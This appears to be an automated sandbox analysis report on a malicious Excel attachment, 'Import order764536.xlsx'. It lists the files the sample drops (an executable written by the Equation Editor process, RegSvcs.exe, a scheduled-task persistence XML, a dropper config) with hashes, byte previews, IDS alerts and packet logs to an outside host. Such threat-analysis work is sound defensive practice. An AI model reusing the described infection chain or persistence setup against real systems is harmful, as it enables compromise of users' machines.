(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C009AF6A.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C5A013CD.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	68702
Entropy (8bit):	7.960564589117156
Encrypted:	false
SSDEEP:
MD5:	9B8C6AB5CD2CC1A2622CC4BB10D745C0
SHA1:	E3C68E3F16AE0A3544720238440EDCE12DFC900E
SHA-256:	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
SHA-512:	407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
Malicious:	false
Preview:	.PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y\|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....\|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y...v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a\|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..\|..8...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D57D5BFC.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	10202
Entropy (8bit):	7.870143202588524
Encrypted:	false
SSDEEP:
MD5:	66EF10508ED9AE9871D59F267FBE15AA
SHA1:	E40FDB09F7FDA69BD95249A76D06371A851F44A6
SHA-256:	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
SHA-512:	678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
Malicious:	false
Preview:	.PNG........IHDR...............\|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y..".d.\|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx............'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.\|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...\|.V+Kws2/......W....Q.,...8X.)c...M..H.\|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb?.....@.....a :.+H...Rh..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E6B61027.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	83904
Entropy (8bit):	7.986000888791215
Encrypted:	false
SSDEEP:
MD5:	9F9A7311810407794A153B7C74AED720
SHA1:	EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
SHA-256:	000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
SHA-512:	27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
Malicious:	false
Preview:	.PNG........IHDR.............oi......IDATx..u\|........@ .@..[.H.5...<....R.8.P...b-....[.!...M..1{on.MB.@...{........r..9s.QTUE".H$..$.a._.@".H$..$...".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...2.D".H$..Q$..D".dG..".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...... y.P....D".H..TU}..RF..jRRR...A.1y..Eyj..d$Ne.U..x..f...,.3.......^.m.ga<r...Q..Y..&....43\|A...~...b...l..&........d../C..... ...sN....;.IFXX<..F.z$..D".dG..E..1.fR.%..= 6((W..5.m....YsM.!.....v..r.....\Y..h.N.M.v....{.%...........gb&.<..7/..).X..(\.......0k......k.d2..KI;...O.X..]j.G..BB(U..........`.zU@=t$...S........N...6..a`..t...z.v:.....M......YUe.N....TI...]NQ.<..vm....o....\|yt:......P..d.]....bE.zr.....UJ.y.b....5...gg..?..;pr..V-..U.66.h...Y.......q_t:.."M..x.7...4Y...aa.@qw.I..=.sgC.....pa.!O.Q.....%.f..P..~.uk...8.......-R....5m.I..S.BCC....9r...O.<8u....Q$..E!).`.6.7V.k+WF^...y...p......5.......\)~Y.7m....../.P._^.0W@.....[....<.R..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EC79CE56.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	68702
Entropy (8bit):	7.960564589117156
Encrypted:	false
SSDEEP:
MD5:	9B8C6AB5CD2CC1A2622CC4BB10D745C0
SHA1:	E3C68E3F16AE0A3544720238440EDCE12DFC900E
SHA-256:	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
SHA-512:	407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
Malicious:	false
Preview:	.PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y\|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....\|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y...v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a\|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..\|..8...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4E77D3E.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	498420
Entropy (8bit):	0.6413430594685933
Encrypted:	false
SSDEEP:
MD5:	C222CCD1034332B55B2897F143B03581
SHA1:	FE8FC79E1DE315C4371B5872CDABD5338A2AD5C6
SHA-256:	595356BB0D0F0B98BF0D8E41FA5CF1D7EE900F392BC4B3DE0106281357E4A750
SHA-512:	14EA11438D2BBD614A89FCE1E6271198B21A54609D9AE85750B4A2370962D9721ABF82E6AEAC1AA8DF02E52E49EBAC05769CD3EEC9B2D9D1974CD4BD20850E5D
Malicious:	false
Preview:	....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................[$........f.[.@..%...t...................RQ.\....................$Q.\........ ...Id.[........ .........<..d.[............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X.......H....8.[......<.dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Temp\RegSvcs.exe Download File
Process:	C:\Users\user\33920049\mmuiqlcvwo.pif
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	45216
Entropy (8bit):	6.136703067968073
Encrypted:	false
SSDEEP:
MD5:	62CE5EF995FD63A1847A196C2E8B267B
SHA1:	114706D7E56E91685042430F783AE227866AA77F
SHA-256:	89F23E31053C39411B4519BF6823969CAD9C7706A94BA7E234B9062ACE229745
SHA-512:	ABACC9B3C03631D3439A992504A11FB3C817456FFA4760EACE8FE5DF86908CE2F24565A717EB35ADCF60C34A78A1F6E24881BA0B8680FDE66D97085FDE4423B2
Malicious:	false
Joe Sandbox View:	Filename: PI.xlsx, Detection: malicious, Browse Filename: swift.xls, Detection: malicious, Browse Filename: PENDING INVOICES.doc, Detection: malicious, Browse Filename: RFQ-2201847.xlsx, Detection: malicious, Browse Filename: Postal Financial Services.doc, Detection: malicious, Browse Filename: 85a3f6aa_by_Libranalysis.rtf, Detection: malicious, Browse Filename: Files Specification.xlsx, Detection: malicious, Browse Filename: Update of the OFFICE PACK.xlam, Detection: malicious, Browse Filename: Quotation Assurance.doc, Detection: malicious, Browse Filename: Update of the OFFICE PACK.doc, Detection: malicious, Browse Filename: DHL Documents 7.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'.W..............0..d............... ........@.. ...............................J....`.....................................O.......8............r...>..........t................................................ ............... ..H............text....c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B........................H........+..4S..........$...P...t........................................r...p(....2.(....(....z..r...p(....(....(......}......{.....s..........0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o.........(....o ...o!.....,..o"...t........0..(....... ....s#........o$....X..(....-...o%....0...........(&......&.........................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

C:\Users\user\AppData\Local\Temp\tmp7677.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1308
Entropy (8bit):	5.10308114203322
Encrypted:	false
SSDEEP:
MD5:	8ECDD2338BF1DCD4DDA0C0FB1AA7216B
SHA1:	BA3A56765CF577D12CFDCEC6D1BA79A1425AC65A
SHA-256:	E68557FA69E3E09BC76444A92B98313C8BFEA14AB42E581CF4129117702386DC
SHA-512:	7499BD382CC2E3A63C9938EFA8CFE70461F3248AE185D7D8F3300F4490CDEB2823CF2C168FEB4E0C4CC6803FD8F995D2A24D433DDF61611EF7240E58507CD637
Malicious:	true
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:
MD5:	026FE3A73F30ED51820D936A03AF9C95
SHA1:	62D292056CF26A58D860D75F4C2A98BC4F91EF64
SHA-256:	AA1E1FDACFC0C58F21BF51B6F1E54A8B827DC31F6B4F2EDFFEAEFD45E7DE8583
SHA-512:	42481B60ACB436A601DBE111A2E69F9F152793C45314BB64D6B7749072F5BB52DB863323C260A30090FD3CF18EFDE95D27A695D98BA7F9C3EB0C861E7A256651
Malicious:	true
Reputation:	unknown
Preview:	..y.j..H

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\task.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	45
Entropy (8bit):	4.366759974483214
Encrypted:	false
SSDEEP:
MD5:	274639AEBFFC3A903D57150C8E7E3D80
SHA1:	A5B43DB77933BAC72A1E991DA56128136C776C30
SHA-256:	C5E8989F5CE86EB4B4058D058C4F4ADB2D360BB55E2D4152397CF772B1D02E1C
SHA-512:	18710EDCA8D608ED7F04D108B091924FFFE61C327BC827C53C1C74411FE9531A093AA93B908F5E9A78E8D2355B85EAE2F9B9E79CAE75E90F755040CFFD8437F0
Malicious:	false
Reputation:	unknown
Preview:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe

C:\Users\user\Desktop\~$Import order764536.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	false
Reputation:	unknown
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\temp\qhqulleu.mp3 Download File
Process:	C:\Users\user\33920049\mmuiqlcvwo.pif
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	95
Entropy (8bit):	5.071141961542051
Encrypted:	false
SSDEEP:
MD5:	E241BA8C7BF12A7128E7C0AD28348930
SHA1:	ACFC821D16BAB7535369917F41BB21ADA15E3BC0
SHA-256:	0B64183C8B6E30C78D7EB1997E3686A1CE832B3CB0092F09CA76BA5FD5EE0B9C
SHA-512:	26A78974A6794751B052B58EB01C3BF9030E1116050C24A86326E31F1F11E1289860AC915F055B13F29AF3D0BED1E73CE9C5EAFC1196DD1C9CACA9C2E5602376
Malicious:	false
Reputation:	unknown
Preview:	[S3tt!ng]..stpth=%userprofile%..Key=Windows element..Dir3ctory=33920049..ExE_c=mmuiqlcvwo.pif..

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1073384
Entropy (8bit):	7.832162830296474
Encrypted:	false
SSDEEP:
MD5:	B866823E1F8F4A52376BD108C457DD78
SHA1:	FE99849EC27630463080445337798EEBA8000A02
SHA-256:	EBE1BB18A77CF0B34D3AD06919A9ADFFF2AA69CFAFA5B96B670534B890E3E2A8
SHA-512:	FD1732CA7DC310395581D835EA3DF1E7AD664C75C9C7F68BA55C0B2E521383A0C8781B490F7CC05428D6E534B356A585BF11B57E57808CC37EA08DABF4A09E13
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'...Rich&...................PE..L....}\|^.....................(............... ....@.......................................@.........................@...4...t...<.... ..(L...................p...!.....T............................B..@............ ..`...... ....................text............................... ..`.rdata..2.... ......................@..@.data....8..........................@....gfids..............................@..@.rsrc...(L... ...N..................@..@.reloc...!...p..."..................@..B........................................................................................................................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.972494138604762
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	Import order764536.xlsx
File size:	329288
MD5:	cf9700bcf6687a0f9bc3b205b43b40ba
SHA1:	1bcc9522f4f8e1938939e2721b834c5f51cf81d1
SHA256:	61c38201d62bd19e606f4f4e78805932442d872aea57651ab949b96bbb6b4121
SHA512:	ebd879d95685dd3f2fc02b2dccfdbadedb51dadc26abc90180cbbcd89a81ce666e4b674f3d852b79399f877659966b6d3a5f8e1d50d556edba3ed15baff70ab4
SSDEEP:	6144:oFdtTEkYk4nzohTixTbXW4cRk8zHlcEbGQsIJTz81LKD7barZBS:oFdtxYk4eTgSDJHPDs+/8RUbalY
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/13/21-09:59:47.354702	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	50591	8.8.8.8	192.168.2.22
10/13/21-09:59:47.374175	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	50591	8.8.8.8	192.168.2.22
10/13/21-09:59:52.887907	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	57805	8.8.8.8	192.168.2.22
10/13/21-10:00:24.135767	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	55616	8.8.8.8	192.168.2.22
10/13/21-10:00:50.093736	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	51771	8.8.8.8	192.168.2.22
10/13/21-10:00:50.207655	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	51771	8.8.8.8	192.168.2.22
10/13/21-10:00:50.323593	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	51771	8.8.8.8	192.168.2.22
10/13/21-10:00:50.342456	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	51771	8.8.8.8	192.168.2.22
10/13/21-10:00:50.361337	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	51771	8.8.8.8	192.168.2.22
10/13/21-10:01:00.854656	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	50315	8.8.8.8	192.168.2.22
10/13/21-10:01:00.880428	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	50315	8.8.8.8	192.168.2.22
10/13/21-10:01:00.994245	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	50315	8.8.8.8	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 09:59:21.317526102 CEST	49165	80	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:21.414338112 CEST	80	49165	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:21.414518118 CEST	49165	80	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:21.414997101 CEST	49165	80	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:21.514235973 CEST	80	49165	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:21.515645027 CEST	80	49165	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:21.516555071 CEST	49165	80	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:21.534657955 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:21.534708023 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:21.536199093 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:21.548351049 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:21.548379898 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:21.758630991 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:21.758790970 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:21.775974989 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:21.776025057 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:21.776443005 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:21.776597977 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.042098045 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.087136984 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.139942884 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.140019894 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.140053034 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.140070915 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.140131950 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.140136957 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.237624884 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.237749100 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.237860918 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.237927914 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.237966061 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.238042116 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.238084078 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.334064007 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.334162951 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.334321022 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.334341049 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.334403992 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.334486961 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.337006092 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.337120056 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.337121964 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.337136984 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.337193966 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.337218046 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.337290049 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.337315083 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.337400913 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.337485075 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.337496042 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.337527037 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.337544918 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.340106964 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.431241989 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.431370974 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.431541920 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.431570053 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.431639910 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.431921005 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.434273005 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.434384108 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.434587002 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.435487032 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.435558081 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.435594082 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.435645103 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.435671091 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.435729980 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.435760975 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.435808897 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.435890913 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.435936928 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.435978889 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.436028004 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.436064959 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.436114073 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.436146975 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.436198950 CEST	49166	443	192.168.2.22	97.107.138.110
Oct 13, 2021 09:59:22.436234951 CEST	443	49166	97.107.138.110	192.168.2.22
Oct 13, 2021 09:59:22.436284065 CEST	49166	443	192.168.2.22	97.107.138.110
